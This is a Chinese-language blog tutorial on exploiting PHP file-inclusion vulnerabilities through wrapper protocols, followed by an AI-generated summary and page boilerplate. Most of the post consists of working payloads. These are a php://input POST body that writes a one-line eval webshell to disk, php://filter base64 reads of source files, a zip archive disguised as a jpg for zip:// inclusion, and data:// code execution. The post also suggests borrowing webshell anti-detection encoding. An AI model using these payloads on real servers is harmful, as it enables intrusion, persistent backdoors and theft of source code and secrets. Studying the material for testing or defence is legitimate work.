文件包含之伪协议的使用

文件包含漏洞利用实例

1. php流的input

http://127.0.0.1/include/03/index.php?page=php://input

然后要用post类型提交数据

这里可以这么提交:

<?php 
fputs(fopen("shell.php","w"),"<?php @eval(\$_POST["hack"])?>")
?>

这里通过直接写入一个木马文件,来进行攻击。

所以不只是文件上传点可以写入木马,php的input流也可以写入一句话木马。

2. php流的filter协议

?page=php://filter/read=convert.base64-encode/resource=index.php

?page=php://filter/convert.base64-encode/resource=index.php

通过指定末尾的文件,可以读取经base64编码后的文件源码,之后再base64解码一下就行。

虽然不能直接获取到shell等,但能读取敏感文件危害也是挺大的。

allow_url_include和allow_url fopen都不做要求,这是非常大的优势。

3. zip压缩流

?page=zip://C:/Users/40454/Desktop/test.jpg%23test.txt

先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传。、

注意,这里必须是绝对路径

4. data协议

?file=data://text/plain,<?php phpinfo();?>

但在利用时有很多问题。

后面php代码容易被查杀,所以要灵活利用编码等方法,可以借鉴webshell免杀,原理都是一样的。

<?php phpinfo();?>在编成base64的时候出现了+。而浏览器不认识+号。

解决思路:

不写后面的 ?> 因为PHP里面其实不需要写后面的 前面的 ;号就已经说明结束了。

如果没有;号就必须写 ?>作为结束。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
伪协议filter是一种用于文件包含伪协议。它不受allow_url_fopen和allow_url_include参数的影响,可以用来读取本地文件系统或访问HTTP、FTP等协议的URL。 在PHP中,可以使用php://filter伪协议来读取文件内容并对其进行处理。例如,使用php://filter/resource=来读取文件内容,php://filter/read=convert.base64-encode/resource=可以将文件内容以base64编码输出。 通过使用filter伪协议,攻击者可以利用文件包含漏洞来读取敏感文件,包括PHP源代码、配置文件等。因此,在编写PHP代码时,务必要注意对用户输入进行严格过滤和验证,避免文件包含漏洞的利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [文件包含-伪协议](https://blog.csdn.net/Wu000999/article/details/101925271)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTF---Web---文件包含---02---rot13伪协议](https://blog.csdn.net/qq_22160557/article/details/119174803)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值